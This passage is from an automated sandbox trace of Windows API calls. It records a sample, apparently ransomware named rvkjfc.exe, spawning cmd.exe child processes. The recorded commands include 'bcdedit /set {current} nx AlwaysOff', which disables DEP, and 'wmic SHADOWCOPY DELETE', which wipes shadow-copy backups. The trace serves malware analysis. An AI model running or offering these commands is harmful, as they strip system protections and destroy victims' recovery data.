-2 [0045.038] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0045.038] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0045.038] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0045.038] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0045.038] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0045.038] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0045.038] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0045.038] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0045.038] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0045.038] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0045.038] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0045.038] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0045.038] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0045.038] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0045.038] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0045.038] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0045.038] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0045.038] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0045.038] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0045.038] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0045.038] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0045.039] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0045.039] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0045.039] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0045.039] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0045.039] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0045.039] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0045.039] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0045.039] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0045.039] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0045.039] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0045.039] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0045.039] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0045.039] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0045.039] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0045.039] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0045.039] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0045.039] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0045.039] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0045.039] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0045.039] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0045.039] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0045.039] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0045.039] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0045.039] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0045.039] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0045.039] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0045.039] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0045.039] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0045.039] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0045.039] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0045.039] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0045.039] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0045.039] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0045.039] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0045.039] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0045.039] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0045.039] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0045.039] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0045.039] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0045.040] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0045.040] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0045.040] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0045.040] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0045.040] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0045.040] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0045.040] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0045.040] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0045.040] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0045.040] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0045.040] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0045.040] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0045.040] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0045.040] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0045.040] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0045.040] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0045.040] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0045.040] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0045.040] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0045.040] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0045.040] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0045.040] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0045.040] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0045.040] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0045.040] GetProcessHeap () returned 0x280000 [0045.041] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x218) returned 0x29b890 [0045.041] GetProcessHeap () returned 0x280000 [0045.041] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x62) returned 0x29bab0 [0045.041] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0045.041] GetProcessHeap () returned 0x280000 [0045.041] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x420) returned 0x29bb20 [0045.041] SetErrorMode (uMode=0x0) returned 0x0 [0045.041] SetErrorMode (uMode=0x1) returned 0x0 [0045.042] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x29bb30, lpFilePart=0x18f040 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18f040*="Desktop") returned 0x25 [0045.042] SetErrorMode (uMode=0x0) returned 0x1 [0045.042] GetProcessHeap () returned 0x280000 [0045.042] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x29bb20, Size=0x74) returned 0x29bb20 [0045.042] GetProcessHeap () returned 0x280000 [0045.042] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29bb20) returned 0x74 [0045.042] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0045.042] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0045.042] GetProcessHeap () returned 0x280000 [0045.042] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x128) returned 0x29bbb0 [0045.042] GetProcessHeap () returned 0x280000 [0045.042] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x240) returned 0x29bce0 [0045.047] GetProcessHeap () returned 0x280000 [0045.047] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x29bce0, Size=0x12a) returned 0x29bce0 [0045.047] GetProcessHeap () returned 0x280000 [0045.047] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29bce0) returned 0x12a [0045.047] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0045.048] GetProcessHeap () returned 0x280000 [0045.048] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xe8) returned 0x29be20 [0045.048] GetProcessHeap () returned 0x280000 [0045.048] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x29be20, Size=0x7e) returned 0x29be20 [0045.048] GetProcessHeap () returned 0x280000 [0045.048] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29be20) returned 0x7e [0045.048] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.049] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x18edb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18edb0) returned 0xffffffffffffffff [0045.049] GetLastError () returned 0x2 [0045.049] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.exe.*", fInfoLevelId=0x1, lpFindFileData=0x18edb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18edb0) returned 0xffffffffffffffff [0045.049] GetLastError () returned 0x2 [0045.049] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x18edb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18edb0) returned 0xffffffffffffffff [0045.049] GetLastError () returned 0x2 [0045.049] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.049] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x18edb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18edb0) returned 0x299a60 [0045.049] GetProcessHeap () returned 0x280000 [0045.049] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x28) returned 0x294620 [0045.049] FindClose (in: hFindFile=0x299a60 | out: hFindFile=0x299a60) returned 1 [0045.049] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0045.049] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0045.049] GetConsoleTitleW (in: lpConsoleTitle=0x18f300, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe") returned 0x30 [0045.050] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f0b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f078 | out: lpAttributeList=0x18f0b8, lpSize=0x18f078) returned 1 [0045.050] UpdateProcThreadAttribute (in: lpAttributeList=0x18f0b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f068, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f0b8, lpPreviousValue=0x0) returned 1 [0045.050] GetStartupInfoW (in: lpStartupInfo=0x18f1d0 | out: lpStartupInfo=0x18f1d0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0045.050] GetProcessHeap () returned 0x280000 [0045.050] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x20) returned 0x294650 [0045.050] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0045.050] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0045.050] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0045.050] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0045.050] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0045.050] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0045.050] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0045.050] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0045.050] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0045.050] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0045.050] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0045.050] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0045.051] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0045.051] GetProcessHeap () returned 0x280000 [0045.051] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294650 | out: hHeap=0x280000) returned 1 [0045.051] GetProcessHeap () returned 0x280000 [0045.051] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x12) returned 0x298370 [0045.051] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0045.053] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit.exe /set {current} nx AlwaysOff", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x18f0f0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit.exe /set {current} nx AlwaysOff", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f0a0 | out: lpCommandLine="bcdedit.exe /set {current} nx AlwaysOff", lpProcessInformation=0x18f0a0*(hProcess=0x54, hThread=0x50, dwProcessId=0x174, dwThreadId=0x15c)) returned 1 [0045.056] CloseHandle (hObject=0x50) returned 1 [0045.056] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0045.056] GetProcessHeap () returned 0x280000 [0045.056] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29d730 | out: hHeap=0x280000) returned 1 [0045.056] GetEnvironmentStringsW () returned 0x29cc40* [0045.056] GetProcessHeap () returned 0x280000 [0045.056] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xae8) returned 0x29d730 [0045.056] FreeEnvironmentStringsW (penv=0x29cc40) returned 1 [0045.056] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0045.657] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x18efe8 | out: lpExitCode=0x18efe8*=0x0) returned 1 [0045.657] CloseHandle (hObject=0x54) returned 1 [0045.658] _vsnwprintf (in: _Buffer=0x18f258, _BufferCount=0x13, _Format="%08X", _ArgList=0x18eff8 | out: _Buffer="00000000") returned 8 [0045.658] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0045.658] GetProcessHeap () returned 0x280000 [0045.658] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29d730 | out: hHeap=0x280000) returned 1 [0045.658] GetEnvironmentStringsW () returned 0x29cc40* [0045.658] GetProcessHeap () returned 0x280000 [0045.658] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb0e) returned 0x29ed40 [0045.659] FreeEnvironmentStringsW (penv=0x29cc40) returned 1 [0045.659] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0045.659] GetProcessHeap () returned 0x280000 [0045.659] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29ed40 | out: hHeap=0x280000) returned 1 [0045.659] GetEnvironmentStringsW () returned 0x29cc40* [0045.659] GetProcessHeap () returned 0x280000 [0045.659] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb0e) returned 0x29ed40 [0045.659] FreeEnvironmentStringsW (penv=0x29cc40) returned 1 [0045.659] GetProcessHeap () returned 0x280000 [0045.691] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x298370 | out: hHeap=0x280000) returned 1 [0045.691] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f0b8 | out: lpAttributeList=0x18f0b8) [0045.691] _get_osfhandle (_FileHandle=1) returned 0x7 [0045.691] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0045.691] _get_osfhandle (_FileHandle=1) returned 0x7 [0045.691] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49d4e194 | out: lpMode=0x49d4e194) returned 1 [0045.691] _get_osfhandle (_FileHandle=0) returned 0x3 [0045.691] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49d4e198 | out: lpMode=0x49d4e198) returned 1 [0045.691] SetConsoleInputExeNameW () returned 0x1 [0045.691] GetConsoleOutputCP () returned 0x1b5 [0045.691] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d5bfe0 | out: lpCPInfo=0x49d5bfe0) returned 1 [0045.691] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0045.692] exit (_Code=0) Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x32ba0000" os_pid = "0x32c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x6dc" cmd_line = "/C wmic SHADOWCOPY DELETE" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 28 os_tid = 0x6a4 [0043.725] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fed0 | out: lpSystemTimeAsFileTime=0x26fed0*(dwLowDateTime=0x26bbb7f0, dwHighDateTime=0x1d5f247)) [0043.725] GetCurrentProcessId () returned 0x32c [0043.725] GetCurrentThreadId () returned 0x6a4 [0043.725] GetTickCount () returned 0x1145b1b [0043.725] QueryPerformanceCounter (in: lpPerformanceCount=0x26fed8 | out: lpPerformanceCount=0x26fed8*=16458690470) returned 1 [0043.726] GetModuleHandleW (lpModuleName=0x0) returned 0x49d20000 [0043.726] __set_app_type (_Type=0x1) [0043.726] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49d47810) returned 0x0 [0043.727] __getmainargs (in: _Argc=0x49d6a608, _Argv=0x49d6a618, _Env=0x49d6a610, _DoWildCard=0, _StartInfo=0x49d4e0f4 | out: _Argc=0x49d6a608, _Argv=0x49d6a618, _Env=0x49d6a610) returned 0 [0043.727] GetCurrentThreadId () returned 0x6a4 [0043.727] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x6a4) returned 0x3c [0043.731] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0043.731] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0043.733] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0043.733] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0043.733] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fe68 | out: phkResult=0x26fe68*=0x0) returned 0x2 [0043.826] VirtualQuery (in: lpAddress=0x26fe50, lpBuffer=0x26fdd0, dwLength=0x30 | out: lpBuffer=0x26fdd0*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0043.826] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fdd0, dwLength=0x30 | out: lpBuffer=0x26fdd0*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0043.826] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fdd0, dwLength=0x30 | out: lpBuffer=0x26fdd0*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0043.826] VirtualQuery (in: lpAddress=0x174000, lpBuffer=0x26fdd0, dwLength=0x30 | out: lpBuffer=0x26fdd0*(BaseAddress=0x174000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0043.826] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fdd0, dwLength=0x30 | out: lpBuffer=0x26fdd0*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0043.826] GetConsoleOutputCP () returned 0x1b5 [0043.827] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d5bfe0 | out: lpCPInfo=0x49d5bfe0) returned 1 [0043.831] SetConsoleCtrlHandler (HandlerRoutine=0x49d43184, Add=1) returned 1 [0043.831] _get_osfhandle (_FileHandle=1) returned 0x7 [0043.831] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0043.832] _get_osfhandle (_FileHandle=1) returned 0x7 [0043.832] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49d4e194 | out: lpMode=0x49d4e194) returned 1 [0043.832] _get_osfhandle (_FileHandle=1) returned 0x7 [0043.832] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0043.832] _get_osfhandle (_FileHandle=0) returned 0x3 [0043.832] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49d4e198 | out: lpMode=0x49d4e198) returned 1 [0043.832] _get_osfhandle (_FileHandle=0) returned 0x3 [0043.832] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0043.832] GetEnvironmentStringsW () returned 0x3d8a60* [0043.833] GetProcessHeap () returned 0x3c0000 [0043.833] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xa7c) returned 0x3d94f0 [0043.833] FreeEnvironmentStringsW (penv=0x3d8a60) returned 1 [0043.833] GetProcessHeap () returned 0x3c0000 [0043.833] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x8) returned 0x3d88e0 [0043.833] GetEnvironmentStringsW () returned 0x3d8a60* [0043.833] GetProcessHeap () returned 0x3c0000 [0043.833] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xa7c) returned 0x3d9f80 [0043.833] FreeEnvironmentStringsW (penv=0x3d8a60) returned 1 [0043.833] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ed28 | out: phkResult=0x26ed28*=0x44) returned 0x0 [0043.833] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ed20, lpData=0x26ed40, lpcbData=0x26ed24*=0x1000 | out: lpType=0x26ed20*=0x0, lpData=0x26ed40*=0x18, lpcbData=0x26ed24*=0x1000) returned 0x2 [0043.833] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ed20, lpData=0x26ed40, lpcbData=0x26ed24*=0x1000 | out: lpType=0x26ed20*=0x4, lpData=0x26ed40*=0x1, lpcbData=0x26ed24*=0x4) returned 0x0 [0043.833] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ed20, lpData=0x26ed40, lpcbData=0x26ed24*=0x1000 | out: lpType=0x26ed20*=0x0, lpData=0x26ed40*=0x1, lpcbData=0x26ed24*=0x1000) returned 0x2 [0043.833] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ed20, lpData=0x26ed40, lpcbData=0x26ed24*=0x1000 | out: lpType=0x26ed20*=0x4, lpData=0x26ed40*=0x0, lpcbData=0x26ed24*=0x4) returned 0x0 [0043.833] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ed20, lpData=0x26ed40, lpcbData=0x26ed24*=0x1000 | out: lpType=0x26ed20*=0x4, lpData=0x26ed40*=0x40, lpcbData=0x26ed24*=0x4) returned 0x0 [0043.833] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ed20, lpData=0x26ed40, lpcbData=0x26ed24*=0x1000 | out: lpType=0x26ed20*=0x4, lpData=0x26ed40*=0x40, lpcbData=0x26ed24*=0x4) returned 0x0 [0043.833] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ed20, lpData=0x26ed40, 